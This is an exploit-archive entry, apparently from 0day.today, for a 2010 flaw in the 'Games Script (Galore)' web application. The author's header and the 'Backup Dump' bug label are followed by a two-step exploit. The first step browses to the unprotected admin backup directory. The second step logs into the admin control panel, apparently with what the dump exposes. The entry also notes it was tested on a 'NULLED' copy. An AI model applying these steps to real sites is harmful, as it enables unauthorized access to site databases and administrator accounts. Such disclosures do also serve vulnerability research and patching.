id: 11772
date: 04/13/2010
title: Games Script (Galore) Backup Dump Vulnerability
author: indoushka
cves: 

===============================================
Games Script (Galore) Backup Dump Vulnerability
===============================================

========================================================================================                 
| # Title    : Games Script (Galore) Backup Dump Vulnerability           
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com                                                                            
| # Script   : Copyright © 2008 GamesGalore.tld - [iAG] NULLED     
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Backup Dump                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- http://127.0.0.1/Games Script (Galore)/admincp/backup/
  
 2- http://127.0.0.1/Games Script (Galore)/admincp/ (2 Login)



#  0day.today [2023-03-27]  #